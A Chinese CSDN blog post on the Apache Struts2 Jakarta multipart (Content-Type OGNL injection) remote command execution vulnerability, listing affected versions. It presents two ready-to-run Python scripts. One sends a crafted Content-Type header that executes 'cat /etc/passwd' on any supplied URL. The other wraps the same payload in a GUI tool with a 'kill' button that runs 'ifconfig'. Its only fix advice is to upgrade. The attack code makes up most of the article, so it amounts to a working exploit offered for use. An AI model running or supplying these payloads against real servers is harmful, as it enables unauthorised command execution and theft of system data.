Apache Struts2 POC & EXP

最新推荐文章于 2024-02-26 16:11:58 发布
最新推荐文章于 2024-02-26 16:11:58 发布
阅读量2k 收藏
点赞数
分类专栏: POC 文章标签: POC struts 2 EXP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LC_shandow/article/details/60777702
版权

漏洞简介:Struts使用的Jakarta解析文件上传请求包不当,当远程攻击者构造恶意的Content-Type,可能导致远程命令执行。实际上在default.properties文件中,struts.multipart.parser的值有两个选择,分别是jakarta和pell(另外原本其实也有第三种选择cos)。其中的jakarta解析器是Struts 2框架的标准组成部分。默认情况下jakarta是启用的,所以该漏洞的严重性需要得到正视。

漏洞描述:

恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。

影响范围:

  • Struts 2.3.5 – Struts 2.3.31
  • Struts 2.5 – Struts 2.5.10
POC:

 
#! /usr/bin/env python
# encoding:utf-8
import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers

header1 ={
"Host":"xxxxxxx",
"Connection":"keep-alive",
"Refer":"xxxxxxxx",
"Accept":"*/*",
"X-Requested-With":"XMLHttpRequest",
"Accept-Encoding":"deflate",
"Accept-Language":"zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4",
}

def poc():
    register_openers()
    datagen, header = multipart_encode({"image1": open("test.txt", "rb")})
    header["User-Agent"]="User-Agent=Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0"
    header["Content-Type"]='''%{(#nike='multipart/form-data').
    (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
    (#_memberAccess?(#_memberAccess=#dm):
    ((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
    (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
    (#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
    (#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').
    (#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).
    (#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).
    (#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).
    (#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().
    getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).
    (#ros.flush())}'''
    request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)
    response = urllib2.urlopen(request)
    print response.read()
poc()


EXP:

#coding:utf-8
import urllib2
from Tkinter import *
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers



class START():

    def __init__(self,root):
        self.root=root
        self.show_W_Text = Text()
        self.show_url_ed = Label(root, text="str2")
        self.edit_url = Entry(root, text="输入地址")
        self.butt_whois = Button(root, text="kill",command=self.poc)
        self.show_url_ed.pack()
        self.edit_url.pack()
        self.butt_whois.pack()
        self.show_W_Text.pack()

    def poc(self):
        w_url = self.edit_url.get()
        text = self.show_W_Text
        register_openers()
        datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
        header[
            "User-Agent"] = "User-Agent=Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0"
        header[
            "Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
        request = urllib2.Request(w_url, datagen, headers=header)
        response = urllib2.urlopen(request).read()
        text.insert(1.0, response)


if __name__ == '__main__':

    root=Tk()
    root.title("str2 045")
    motion=START(root)
    mainloop()


 


 
 

解决办法:
 

 

升级!升级!升级!
 


 

                

        

        

    




    

      

        

            

              
                
                  LC_shadow
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
K8 struts2利用工具

				
			

			

				

					12-01
				

			

		

		

			
				
K8 struts2利用工具

			
		

	



                

              
                



	

		

			

				
					
POCEXP、Payload的区别

				
			

			

				

					CC__Faker的博客
				

				

					06-07
					
					5337
					
				

			

		

		

			
				
POCEXP、Payload的区别

POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。
EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。
Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。

总结一下自己的理解
POC:强调发现可能存在漏洞后,对漏洞是否存在的验证
EXP:对已存在的漏洞进行利用,强调利用已有资源
Payload:例如使用了一条恶意SQL语句,使

			
		

	



                


  
              

                


	

		

			

				
					
渗透测试常用术语总结

				
			

			

				

					xv66666的博客
				

				

					07-02
					
					2442
					
				

			

		

		

			
				
想象自己是一个特工,你的目标是监控一个重要的人,有一天你怀疑目标家里的窗子可能没有关,于是你上前推了推,结果推开了,这是一个POC。之后你回去了,开始准备第二天的渗透计划,第二天你通过同样的漏洞渗透进了它家,仔细查看了所有的重要文件,离开时还安装了一个隐蔽的录音笔,这一天你所做的就是一个EXP,你在他家所做的就是不同的Payload,就把录音笔当作Shellcode吧!

			
		

	





	

		

			

				
					
学习网安需要了解的一些基础知识

				
			

			

				

					fencecat的博客
				

				

					02-26
					
					3489
					
				

			

		

		

			
				
很多企业、公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生在人本身。你们可能永远都想象不到,对于黑客们来说,通过一个用户名、一串数字、一串英文代码,社会工程师就可以通过这么几条的线索,通过社工攻击手段,加以筛选、整理,就能把你的所有个人情况信息、家庭状况、兴趣爱好、婚姻状况、你在网上留下的一切痕迹等个人信息全部掌握得一清二楚。虽然这个可能是最不起眼,而且还是最麻烦的方法。一种无需依托任何黑客软件,更注重研究人性弱点的黑客手法正在兴起,这就是社会工程学黑客技术。

			
		

	



		

			
		



	

		

			

				
					
python编写EXP/POC速成小记

				
			

			

				

					U_U520的博客
				

				

					02-22
					
					1952
					
				

			

		

		

			
				
find() 方法检测字符串中是否包含子字符串 str ,如果指定 beg(开始) 和 end(结束) 范围,则检查是否包含在指定范围内,如果包含子字符串返回开始的索引值,否则返回-1。上述脚本存在误报,就是payload只有一个单引号闭合,没办法检验数字型sql,双引号型,’)型,’))等在payload中多加几个类型,可以直接导入自己的FUZZ字典。漏洞刚被批漏之后,有时候现有的工具里面是没有相应的EXP的,那我们可以根据原理写出对应的EXP代码,验证漏洞是否存在。不然会出现报错不适用。

			
		

	





	

		

			

				
					
POC&EXP编写指南.rar

				
			

			

				

					02-11
				

			

		

		

			
				
POC&EXP编写指南》是一份非常实用的资料,主要涵盖了网络安全领域中的Proof of Concept(POC)和Exploit(EXP)的编写方法。在网络安全研究中,POC是证明某一安全漏洞存在的一种技术性验证,而EXP则是利用这个漏洞...

			
		

	





	

		

			

				
					
基于python编写的Web安全检测PoC&&EXP框架+源码+开发文档+代码解析(毕业设计&课程设计&项目开发)

					
最新发布

				
			

			

				

					04-22
				

			

		

		

			
				
基于python编写的Web安全检测PoC&&EXP框架+源码+开发文档+代码解析,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~  基于python编写的Web安全检测PoC&&EXP框架+...

			
		

	





	

		

			

				
					
Vulnerabilities:漏洞PoCExp收集; Vulnerabilities PoC & Exp collections

				
			

			

				

					05-25
				

			

		

		

			
				
针对Windows的PoC很多会被杀毒软件拦截,此为正常现象,请自行斟酌是否下载,如果有带有后门的exp,请通过提交issue联系我。 Windows  Microsoft Windows SMB远程代码执行漏洞(永恒之蓝)  Microsoft IIS 6.0 远程...

			
		

	





	

		

			

				
					
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用)

				
			

			

				

					11-07
				

			

		

		

			
				
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用) [网上流传版]MS12-020 PoC[bug修正版 + 数据包nc发送版] [个人版]ms12-020 Ruby,Python,EXE,DAT,NC一应俱全

			
		

	





	

		

			

				
					
My-Penetration-Tools:记录下自己写的一些懒人脚本,涉及信息收集,漏洞PocExp

				
			

			

				

					03-15
				

			

		

		

			
				
2. **Exp脚本**:一旦确认了漏洞,这些脚本将尝试利用它,可能是为了获取权限、读取敏感数据或进行其他恶意活动。 3. **自动化漏洞扫描**:整合多个Poc,对多个目标进行批量检测。  这些工具的使用应遵循道德规范,...

			
		

	





	

		

			

				
					
常见Exp漏洞POC集合

				
			

			

				

					01-21
				

			

		

		

			
				
该资源为bugscan收集的漏洞poc,喜欢的可以下载下来看看,有需要其他资源的也可以发邮件与我交流shulanyy@gmail.com,作为爱好他是免费的。

			
		

	





	

		

			

				
					
计算机漏洞安全相关的概念POCEXP 、VUL 、CVE 、0DAY

				
			

			

				

					m0_51186260的博客
				

				

					03-30
					
					3522
					
				

			

		

		

			
				
1.POC

POC,Proof ofConcept,中文意思是“观点证明”。这个短语会在漏洞报告中使用,漏洞报告中的POC则是一段说明或者一个攻击的样例,使得读者能够确认这个漏洞是真实存在的。2.EXP

EXPExploit,中文意思是“漏洞利用”。意思是一段对漏洞如何利用的详细说明或者一个演示的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利用的方法。3.VUL

VUL,Vulnerability的缩写,泛指漏洞。4.CVE漏洞编号

CVE 的英文全称是“Common Vulnerabilit

			
		

	





	

		

			

				
					
POCEXP脚本

				
			

			

				

					weixin_45007073的博客
				

				

					01-25
					
					7820
					
				

			

		

		

			
				
引言
在我们的日常渗透测试中,经常挖掘到一些漏洞,但是我们一般使用挖掘工具或者手工判断的时候,不好确定是不是真的存在这么一个漏洞,因此POC脚本就应运而生了。POC全称是Proof of Concept,中文译作概念验证。它是专门为了验证漏洞是否真的存在的脚本。而EXP全称是Exploit,中文译作漏洞利用程序。它是对POC验证结果的一种漏洞利用脚本。
编程基础
因为市面上有关POCEXP脚本的教程比较稀少,但是比较明确的是想要写好POCEXP,一般都要有一些网络编程的基础,python的要会基本的爬虫

			
		

	





	

		

			

				
					
有了这个网络安全面试题,面试就像开了挂!(附PDF)

				
			

			

				

					lvaolan的博客
				

				

					02-26
					
					752
					
				

			

		

		

			
				
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。

			
		

	





	

		

			

				
					
【关注观星公众号】渗透系列之POC编写之刷分大法

				
			

			

				

					Websec
				

				

					12-04
					
					5293
					
				

			

		

		

			
				
一、前言:POC&EXP

什么是POC:即Proof of Concept,是业界流行的针对客户具体应用的验证性测试,根据用户对采用系统提出的性能要求和扩展需求的指标,在选用服务器上进行真实数据的运行,对承载用户数据量和运行时间进行实际测算,并根据用户未来业务扩展的需求加大数据量以验证系统和平台的承载能力和性能变化。在信息安全里,POC为漏洞验证程序,功能为检测漏洞是否存在。pocexp(全称Exploit)的区别就是,poc是漏洞验证程序,exp是漏洞利用程序。针对通用型应用漏洞编写poc,可

			
		

	





	

		

			

				
					
PoCExp、Payload的简单概念

				
			

			

				

					z1moq的博客
				

				

					07-26
					
					2086
					
				

			

		

		

			
				
PoC:全称 ’ Proof of Concept ',中文 ’ 概念验证 ’ ,常指一段漏洞证明的代码。仅用于漏洞的验证,并无较强的攻击效果,并不容易给服务器造成损害与资产泄露
Exp:全称 ’ Exploit ',中文 ’ 利用 ',指利用系统漏洞进行攻击的动作。具有较强的攻击性,可能会造成服务器端的信息泄露或恶意控制
Payload:中文 ’ 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。Payload有很多种,它可以是Shellcode,也可以直接是一段系统命令。同一个Pa

			
		

	





	

		

			

				
					
安鸾渗透Struts2 远程命令执行

				
			

			

				

					LHBD_R的博客
				

				

					09-01
					
					1323
					
				

			

		

		

			
				
一.Struts2 远程命令执行(S2-005)

    简介:
	struts2漏洞的起源源于S2-003
		S2-003对#号进行过滤,但是没有考虑到unicode编码情况,导致\u0023或者8进制\43绕过
		S2-005是由于官方在修补S2-003不全面导致绕过补丁造成的
	
	范围:
	受影响版本: 低于Struts 2.0.12
	
	    漏洞复现:
	安鸾渗透:http://www.whalwl.site:8088/login.jsp
		了解到该漏...

			
		

	





	

		

			

				
					
干货|常用渗透漏洞pocexp收集整理

				
			

			

				

					zhangge3663的博客
				

				

					10-27
					
					4653
					
				

			

		

		

			
				
...

			
		

	





	

		

			

				
					
渗透中POCEXP、Payload与Shellcode的区别

					
热门推荐

				
			

			

				

					浅浅的博客
				

				

					06-17
					
					4万+
					
				

			

		

		

			
				
1. POCEXP、Payload与Shellcode


POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。

EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。

Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。

Shellcode:简单翻译 ' ...

			
		

	





	

		

			

				
					
POCEXP是指什么

				
			

			

				

					03-26
				

			

		

		

			
				
POC是Proof of Concept的缩写,意为原型验证,它是用来验证概念或思想的实际操作。通过POC可以证明某个想法或解决方案的可行性。

EXPExploit的缩写,意为漏洞利用。EXP通常指的是黑客或攻击者通过利用系统中的漏洞来执行恶意代码或攻击目标的过程。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值